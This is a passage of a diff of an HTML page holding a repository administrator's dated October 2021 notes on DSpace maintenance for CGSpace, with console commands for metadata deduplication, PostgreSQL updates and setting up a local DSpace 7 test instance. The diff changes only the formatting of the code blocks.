</span></span><span style="display:flex;"><span> 1600 GET /handle/10947/4467
</span></span><span style="display:flex;"><span> 1607 GET /handle/10568/103816
</span></span><span style="display:flex;"><span> 290382 GET /handle/10568/83389
</span></span></code></pre></div><ul>
<li>Before I purge all those I will ask someone Samuel Stacey from the System Office to hopefully get an insight&hellip;</li>
<li>Meeting with Michael Victor, Peter, Jane, and Abenet about the future of repositories in the One CGIAR</li>
<li>Meeting with Michelle from Altmetric about their new CSV upload system
@ -231,10 +231,10 @@ $ csvgrep -c asn -m <span style="color:#ae81ff">14618</span> /tmp/mozilla-4.0-ip
</code></pre><ul>
<li>Extract the AGROVOC subjects from IWMI&rsquo;s 292 publications to validate them against AGROVOC:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c <span style="color:#e6db74">&#39;dcterms.subject[en_US]&#39;</span> ~/Downloads/2021-10-03-non-IWMI-publications.csv | sed -e 1d -e <span style="color:#e6db74">&#39;s/||/\n/g&#39;</span> -e <span style="color:#e6db74">&#39;s/&#34;//g&#39;</span> | sort -u &gt; /tmp/agrovoc.txt
$ ./ilri/agrovoc-lookup.py -i /tmp/agrovoc-sorted.txt -o /tmp/agrovoc-matches.csv
$ csvgrep -c <span style="color:#e6db74">&#39;number of matches&#39;</span> -m <span style="color:#e6db74">&#39;0&#39;</span> /tmp/agrovoc-matches.csv | csvcut -c <span style="color:#ae81ff">1</span> &gt; /tmp/invalid-agrovoc.csv
</code></pre></div><h2 id="2021-10-05">2021-10-05</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;dcterms.subject[en_US]&#39;</span> ~/Downloads/2021-10-03-non-IWMI-publications.csv | sed -e 1d -e <span style="color:#e6db74">&#39;s/||/\n/g&#39;</span> -e <span style="color:#e6db74">&#39;s/&#34;//g&#39;</span> | sort -u &gt; /tmp/agrovoc.txt
</span></span><span style="display:flex;"><span>$ ./ilri/agrovoc-lookup.py -i /tmp/agrovoc-sorted.txt -o /tmp/agrovoc-matches.csv
</span></span><span style="display:flex;"><span>$ csvgrep -c <span style="color:#e6db74">&#39;number of matches&#39;</span> -m <span style="color:#e6db74">&#39;0&#39;</span> /tmp/agrovoc-matches.csv | csvcut -c <span style="color:#ae81ff">1</span> &gt; /tmp/invalid-agrovoc.csv
</span></span></code></pre></div><h2 id="2021-10-05">2021-10-05</h2>
<ul>
<li>Sam put me in touch with Dodi from the System Office web team and he confirmed that the Amazon requests are not theirs
<ul>
@ -243,11 +243,11 @@ $ csvgrep -c <span style="color:#e6db74">&#39;number of matches&#39;</span> -m <
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-ip-hits.sh -f /tmp/robot-ips.txt -p
...
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 465119
</code></pre></div><h2 id="2021-10-06">2021-10-06</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/robot-ips.txt -p
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 465119
</span></span></code></pre></div><h2 id="2021-10-06">2021-10-06</h2>
<ul>
<li>Thinking about how we could check for duplicates before importing
<ul>
@ -255,14 +255,14 @@ $ csvgrep -c <span style="color:#e6db74">&#39;number of matches&#39;</span> -m <
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; CREATE EXTENSION pg_trgm;
localhost/dspace63= &gt; SELECT metadata_value_id, text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND SIMILARITY(text_value,&#39;Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines&#39;) &gt; 0.5;
metadata_value_id │ text_value │ dspace_object_id
───────────────────┼────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
3652624 │ Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines │ b7f0bf12-b183-4b2f-bbd2-7a5697b0c467
3677663 │ Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines │ fb62f551-f4a5-4407-8cdc-6bff6dac399e
(2 rows)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; CREATE EXTENSION pg_trgm;
</span></span><span style="display:flex;"><span>localhost/dspace63= &gt; SELECT metadata_value_id, text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND SIMILARITY(text_value,&#39;Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines&#39;) &gt; 0.5;
</span></span><span style="display:flex;"><span> metadata_value_id │ text_value │ dspace_object_id
</span></span><span style="display:flex;"><span>───────────────────┼────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
</span></span><span style="display:flex;"><span> 3652624 │ Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines │ b7f0bf12-b183-4b2f-bbd2-7a5697b0c467
</span></span><span style="display:flex;"><span> 3677663 │ Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines │ fb62f551-f4a5-4407-8cdc-6bff6dac399e
</span></span><span style="display:flex;"><span>(2 rows)
</span></span></code></pre></div><ul>
<li>I was able to find an exact duplicate for an IITA item by searching for its title (I already knew that these existed)</li>
<li>I started working on a basic Python script to do this and managed to find an actual duplicate in the recent IWMI items
<ul>
@ -291,10 +291,10 @@ localhost/dspace63= &gt; SELECT metadata_value_id, text_value, dspace_object_id
</li>
<li>Then I ran this new version of csv-metadata-quality on an export of IWMI&rsquo;s community, minus some fields I don&rsquo;t want to check:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -C <span style="color:#e6db74">&#39;dc.date.accessioned,dc.date.accessioned[],dc.date.accessioned[en_US],dc.date.available,dc.date.available[],dc.date.available[en_US],dcterms.issued[en_US],dcterms.issued[],dcterms.issued,dc.description.provenance[en],dc.description.provenance[en_US],dc.identifier.uri,dc.identifier.uri[],dc.identifier.uri[en_US],dcterms.abstract[en_US],dcterms.bibliographicCitation[en_US],collection&#39;</span> ~/Downloads/iwmi.csv &gt; /tmp/iwmi-to-check.csv
$ csv-metadata-quality -i /tmp/iwmi-to-check.csv -o /tmp/iwmi.csv | tee /tmp/out.log
$ xsv split -s <span style="color:#ae81ff">2000</span> /tmp /tmp/iwmi.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -C <span style="color:#e6db74">&#39;dc.date.accessioned,dc.date.accessioned[],dc.date.accessioned[en_US],dc.date.available,dc.date.available[],dc.date.available[en_US],dcterms.issued[en_US],dcterms.issued[],dcterms.issued,dc.description.provenance[en],dc.description.provenance[en_US],dc.identifier.uri,dc.identifier.uri[],dc.identifier.uri[en_US],dcterms.abstract[en_US],dcterms.bibliographicCitation[en_US],collection&#39;</span> ~/Downloads/iwmi.csv &gt; /tmp/iwmi-to-check.csv
</span></span><span style="display:flex;"><span>$ csv-metadata-quality -i /tmp/iwmi-to-check.csv -o /tmp/iwmi.csv | tee /tmp/out.log
</span></span><span style="display:flex;"><span>$ xsv split -s <span style="color:#ae81ff">2000</span> /tmp /tmp/iwmi.csv
</span></span></code></pre></div><ul>
<li>I noticed each CSV only had 10 or 20 corrections, mostly that none of the duplicate metadata values were removed in the CSVs&hellip;
<ul>
<li>I cut a subset of the fields from the main CSV and tried again, but DSpace said &ldquo;no changes detected&rdquo;</li>
@ -319,54 +319,54 @@ Try doing it in two imports. In first import, remove all authors. In second impo
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c <span style="color:#e6db74">&#39;id,cg.contributor.affiliation[en_US],cg.coverage.country[en_US],cg.coverage.iso3166-alpha2[en_US],cg.coverage.subregion[en_US],cg.identifier.doi[en_US],cg.identifier.iwmilibrary[en_US],cg.identifier.url[en_US],cg.isijournal[en_US],cg.issn[en_US],cg.river.basin[en_US],dc.contributor.author[en_US],dcterms.subject[en_US]&#39;</span> ~/Downloads/iwmi.csv &gt; /tmp/iwmi-duplicate-metadata.csv
# Copy and blank columns in OpenRefine
$ csv-metadata-quality -i ~/Downloads/2021-10-07-IWMI-duplicate-metadata-csv.csv -o /tmp/iwmi-duplicates-cleaned.csv | tee /tmp/out.log
$ xsv split -s <span style="color:#ae81ff">2000</span> /tmp /tmp/iwmi-duplicates-cleaned.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;id,cg.contributor.affiliation[en_US],cg.coverage.country[en_US],cg.coverage.iso3166-alpha2[en_US],cg.coverage.subregion[en_US],cg.identifier.doi[en_US],cg.identifier.iwmilibrary[en_US],cg.identifier.url[en_US],cg.isijournal[en_US],cg.issn[en_US],cg.river.basin[en_US],dc.contributor.author[en_US],dcterms.subject[en_US]&#39;</span> ~/Downloads/iwmi.csv &gt; /tmp/iwmi-duplicate-metadata.csv
</span></span><span style="display:flex;"><span># Copy and blank columns in OpenRefine
</span></span><span style="display:flex;"><span>$ csv-metadata-quality -i ~/Downloads/2021-10-07-IWMI-duplicate-metadata-csv.csv -o /tmp/iwmi-duplicates-cleaned.csv | tee /tmp/out.log
</span></span><span style="display:flex;"><span>$ xsv split -s <span style="color:#ae81ff">2000</span> /tmp /tmp/iwmi-duplicates-cleaned.csv
</span></span></code></pre></div><ul>
<li>It takes a few hours per 2,000 items because DSpace processes them so slowly&hellip; sigh&hellip;</li>
</ul>
<h2 id="2021-10-08">2021-10-08</h2>
<ul>
<li>I decided to update these records in PostgreSQL instead of via several CSV batches, as there were several others to normalize too:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">cgspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
text_lang | count
-----------+---------
en_US | 2603711
en_Fu | 115568
en | 8818
| 5286
fr | 2
vn | 2
| 0
(7 rows)
cgspace=# BEGIN;
cgspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN (&#39;en_Fu&#39;, &#39;en&#39;, &#39;&#39;);
UPDATE 129673
cgspace=# COMMIT;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>cgspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
</span></span><span style="display:flex;"><span> text_lang | count
</span></span><span style="display:flex;"><span>-----------+---------
</span></span><span style="display:flex;"><span> en_US | 2603711
</span></span><span style="display:flex;"><span> en_Fu | 115568
</span></span><span style="display:flex;"><span> en | 8818
</span></span><span style="display:flex;"><span> | 5286
</span></span><span style="display:flex;"><span> fr | 2
</span></span><span style="display:flex;"><span> vn | 2
</span></span><span style="display:flex;"><span> | 0
</span></span><span style="display:flex;"><span>(7 rows)
</span></span><span style="display:flex;"><span>cgspace=# BEGIN;
</span></span><span style="display:flex;"><span>cgspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN (&#39;en_Fu&#39;, &#39;en&#39;, &#39;&#39;);
</span></span><span style="display:flex;"><span>UPDATE 129673
</span></span><span style="display:flex;"><span>cgspace=# COMMIT;
</span></span></code></pre></div><ul>
<li>So all this effort to remove ~400 duplicate metadata values in the IWMI community hmmm:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ grep -c <span style="color:#e6db74">&#39;Removing duplicate value&#39;</span> /tmp/out.log
391
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -c <span style="color:#e6db74">&#39;Removing duplicate value&#39;</span> /tmp/out.log
</span></span><span style="display:flex;"><span>391
</span></span></code></pre></div><ul>
<li>I tried to export ILRI&rsquo;s community, but ran into the export bug (DS-4211)
<ul>
<li>After applying the patch on my local instance I was able to export, but found many duplicate items in the CSV (as I also noticed in 2021-02):</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c id /tmp/ilri-duplicate-metadata.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> | wc -l
32070
$ csvcut -c id /tmp/ilri-duplicate-metadata.csv | sort -u | sed <span style="color:#e6db74">&#39;1d&#39;</span> | wc -l
19315
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id /tmp/ilri-duplicate-metadata.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> | wc -l
</span></span><span style="display:flex;"><span>32070
</span></span><span style="display:flex;"><span>$ csvcut -c id /tmp/ilri-duplicate-metadata.csv | sort -u | sed <span style="color:#e6db74">&#39;1d&#39;</span> | wc -l
</span></span><span style="display:flex;"><span>19315
</span></span></code></pre></div><ul>
<li>It seems there are only about 200 duplicate values in this subset of fields in ILRI&rsquo;s community:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ grep -c <span style="color:#e6db74">&#39;Removing duplicate value&#39;</span> /tmp/out.log
220
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -c <span style="color:#e6db74">&#39;Removing duplicate value&#39;</span> /tmp/out.log
</span></span><span style="display:flex;"><span>220
</span></span></code></pre></div><ul>
<li>I found a cool way to select only the items with corrections
<ul>
<li>First, extract a handful of fields from the CSV with csvcut</li>
@ -376,14 +376,14 @@ $ csvcut -c id /tmp/ilri-duplicate-metadata.csv | sort -u | sed <span style="col
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c <span style="color:#e6db74">&#39;id,cg.contributor.affiliation[en_US],cg.coverage.country[en_US],cg.coverage.iso3166-alpha2[en_US],cg.coverage.subregion[en_US],cg.identifier.doi[en_US],cg.identifier.url[en_US],cg.isijournal[en_US],cg.issn[en_US],dc.contributor.author[en_US],dcterms.subject[en_US]&#39;</span> /tmp/ilri.csv | csvsort | uniq &gt; /tmp/ilri-deduplicated-items.csv
$ csv-metadata-quality -i /tmp/ilri-deduplicated-items.csv -o /tmp/ilri-deduplicated-items-cleaned.csv | tee /tmp/out.log
$ sed -i -e <span style="color:#e6db74">&#39;1s/en_US/en_Fu/g&#39;</span> /tmp/ilri-deduplicated-items-cleaned.csv
$ csvjoin -c id /tmp/ilri-deduplicated-items.csv /tmp/ilri-deduplicated-items-cleaned.csv &gt; /tmp/ilri-deduplicated-items-cleaned-joined.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;id,cg.contributor.affiliation[en_US],cg.coverage.country[en_US],cg.coverage.iso3166-alpha2[en_US],cg.coverage.subregion[en_US],cg.identifier.doi[en_US],cg.identifier.url[en_US],cg.isijournal[en_US],cg.issn[en_US],dc.contributor.author[en_US],dcterms.subject[en_US]&#39;</span> /tmp/ilri.csv | csvsort | uniq &gt; /tmp/ilri-deduplicated-items.csv
</span></span><span style="display:flex;"><span>$ csv-metadata-quality -i /tmp/ilri-deduplicated-items.csv -o /tmp/ilri-deduplicated-items-cleaned.csv | tee /tmp/out.log
</span></span><span style="display:flex;"><span>$ sed -i -e <span style="color:#e6db74">&#39;1s/en_US/en_Fu/g&#39;</span> /tmp/ilri-deduplicated-items-cleaned.csv
</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/ilri-deduplicated-items.csv /tmp/ilri-deduplicated-items-cleaned.csv &gt; /tmp/ilri-deduplicated-items-cleaned-joined.csv
</span></span></code></pre></div><ul>
<li>Then I imported the file into OpenRefine and used a custom text facet with a GREL like this to identify the rows with changes:</li>
</ul>
<pre tabindex="0"><code>if(cells['dcterms.subject[en_US]'].value == cells['dcterms.subject[en_Fu]'].value,&quot;same&quot;,&quot;different&quot;)
<pre tabindex="0"><code>if(cells[&#39;dcterms.subject[en_US]&#39;].value == cells[&#39;dcterms.subject[en_Fu]&#39;].value,&#34;same&#34;,&#34;different&#34;)
</code></pre><ul>
<li>For these rows I starred them and then blanked out the original field so DSpace would see it as a removal, and add the new column
<ul>
@ -392,9 +392,9 @@ $ csvjoin -c id /tmp/ilri-deduplicated-items.csv /tmp/ilri-deduplicated-items-cl
</li>
<li>I did the same for CIAT but there were over 7,000 duplicate metadata values! Hard to believe:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ grep -c <span style="color:#e6db74">&#39;Removing duplicate value&#39;</span> /tmp/out.log
7720
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -c <span style="color:#e6db74">&#39;Removing duplicate value&#39;</span> /tmp/out.log
</span></span><span style="display:flex;"><span>7720
</span></span></code></pre></div><ul>
<li>I applied these to the CIAT community, so in total that&rsquo;s over 8,000 duplicate metadata values removed in a handful of fields&hellip;</li>
</ul>
<h2 id="2021-10-09">2021-10-09</h2>
@ -402,14 +402,14 @@ $ csvjoin -c id /tmp/ilri-deduplicated-items.csv /tmp/ilri-deduplicated-items-cl
<li>I did similar metadata cleanups for CCAFS and IITA too, but there were only a few hundred duplicates there</li>
<li>Also of note, there are some other fixes too, for example in IITA&rsquo;s community:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ grep -c -E <span style="color:#e6db74">&#39;(Fixing|Removing) (duplicate|excessive|invalid)&#39;</span> /tmp/out.log
249
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -c -E <span style="color:#e6db74">&#39;(Fixing|Removing) (duplicate|excessive|invalid)&#39;</span> /tmp/out.log
</span></span><span style="display:flex;"><span>249
</span></span></code></pre></div><ul>
<li>I ran a full Discovery re-indexing on CGSpace</li>
<li>Then I exported all of CGSpace and extracted the ISSNs and ISBNs:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c <span style="color:#e6db74">&#39;id,cg.issn[en_US],dc.identifier.issn[en_US],cg.isbn[en_US],dc.identifier.isbn[en_US]&#39;</span> /tmp/cgspace.csv &gt; /tmp/cgspace-issn-isbn.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;id,cg.issn[en_US],dc.identifier.issn[en_US],cg.isbn[en_US],dc.identifier.isbn[en_US]&#39;</span> /tmp/cgspace.csv &gt; /tmp/cgspace-issn-isbn.csv
</span></span></code></pre></div><ul>
<li>I did cleanups on about seventy items with invalid and mixed ISSNs/ISBNs</li>
</ul>
<h2 id="2021-10-10">2021-10-10</h2>
@ -417,42 +417,42 @@ $ csvjoin -c id /tmp/ilri-deduplicated-items.csv /tmp/ilri-deduplicated-items-cl
<li>Start testing DSpace 7.1-SNAPSHOT to see if it has the duplicate item bug on <code>metadata-export</code> (DS-4211)</li>
<li>First create a new PostgreSQL 13 container:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ podman run --name dspacedb13 -v dspacedb13_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD<span style="color:#f92672">=</span>postgres -p 5433:5432 -d postgres:13-alpine
$ createuser -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres --pwprompt dspacetest
$ createdb -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres -O dspacetest --encoding<span style="color:#f92672">=</span>UNICODE dspace7
$ psql -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres dspace7 -c <span style="color:#e6db74">&#39;CREATE EXTENSION pgcrypto;&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ podman run --name dspacedb13 -v dspacedb13_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD<span style="color:#f92672">=</span>postgres -p 5433:5432 -d postgres:13-alpine
</span></span><span style="display:flex;"><span>$ createuser -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres --pwprompt dspacetest
</span></span><span style="display:flex;"><span>$ createdb -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres -O dspacetest --encoding<span style="color:#f92672">=</span>UNICODE dspace7
</span></span><span style="display:flex;"><span>$ psql -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres dspace7 -c <span style="color:#e6db74">&#39;CREATE EXTENSION pgcrypto;&#39;</span>
</span></span></code></pre></div><ul>
<li>Then edit setting in <code>dspace/config/local.cfg</code> and build the backend server with Java 11:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ mvn package
$ cd dspace/target/dspace-installer
$ ant fresh_install
# fix database not being fully ready, causing Tomcat to fail to start the server application
$ ~/dspace7/bin/dspace database migrate
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ mvn package
</span></span><span style="display:flex;"><span>$ cd dspace/target/dspace-installer
</span></span><span style="display:flex;"><span>$ ant fresh_install
</span></span><span style="display:flex;"><span># fix database not being fully ready, causing Tomcat to fail to start the server application
</span></span><span style="display:flex;"><span>$ ~/dspace7/bin/dspace database migrate
</span></span></code></pre></div><ul>
<li>Copy Solr configs and start Solr:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cp -Rv ~/dspace7/solr/* ~/src/solr-8.8.2/server/solr/configsets
$ ~/src/solr-8.8.2/bin/solr start
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cp -Rv ~/dspace7/solr/* ~/src/solr-8.8.2/server/solr/configsets
</span></span><span style="display:flex;"><span>$ ~/src/solr-8.8.2/bin/solr start
</span></span></code></pre></div><ul>
<li>Start my local Tomcat 9 instance:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ systemctl --user start tomcat9@dspace7
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ systemctl --user start tomcat9@dspace7
</span></span></code></pre></div><ul>
<li>This works, so now I will drop the default database and import a dump from CGSpace</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ systemctl --user stop tomcat9@dspace7
$ dropdb -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres dspace7
$ createdb -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres -O dspacetest --encoding<span style="color:#f92672">=</span>UNICODE dspace7
$ psql -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres -c <span style="color:#e6db74">&#39;alter user dspacetest superuser;&#39;</span>
$ pg_restore -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres -d dspace7 -O --role<span style="color:#f92672">=</span>dspacetest -h localhost dspace-2021-10-09.backup
$ psql -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres -c <span style="color:#e6db74">&#39;alter user dspacetest nosuperuser;&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ systemctl --user stop tomcat9@dspace7
</span></span><span style="display:flex;"><span>$ dropdb -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres dspace7
</span></span><span style="display:flex;"><span>$ createdb -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres -O dspacetest --encoding<span style="color:#f92672">=</span>UNICODE dspace7
</span></span><span style="display:flex;"><span>$ psql -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres -c <span style="color:#e6db74">&#39;alter user dspacetest superuser;&#39;</span>
</span></span><span style="display:flex;"><span>$ pg_restore -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres -d dspace7 -O --role<span style="color:#f92672">=</span>dspacetest -h localhost dspace-2021-10-09.backup
</span></span><span style="display:flex;"><span>$ psql -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres -c <span style="color:#e6db74">&#39;alter user dspacetest nosuperuser;&#39;</span>
</span></span></code></pre></div><ul>
<li>Delete Atmire migrations and some others that were &ldquo;unresolved&rdquo;:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ psql -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres dspace7 -c <span style="color:#e6db74">&#34;DELETE FROM schema_version WHERE description LIKE &#39;%Atmire%&#39; OR description LIKE &#39;%CUA%&#39; OR description LIKE &#39;%cua%&#39;;&#34;</span>
$ psql -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres dspace7 -c <span style="color:#e6db74">&#34;DELETE FROM schema_version WHERE version IN (&#39;5.0.2017.09.25&#39;, &#39;6.0.2017.01.30&#39;, &#39;6.0.2017.09.25&#39;);&#34;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres dspace7 -c <span style="color:#e6db74">&#34;DELETE FROM schema_version WHERE description LIKE &#39;%Atmire%&#39; OR description LIKE &#39;%CUA%&#39; OR description LIKE &#39;%cua%&#39;;&#34;</span>
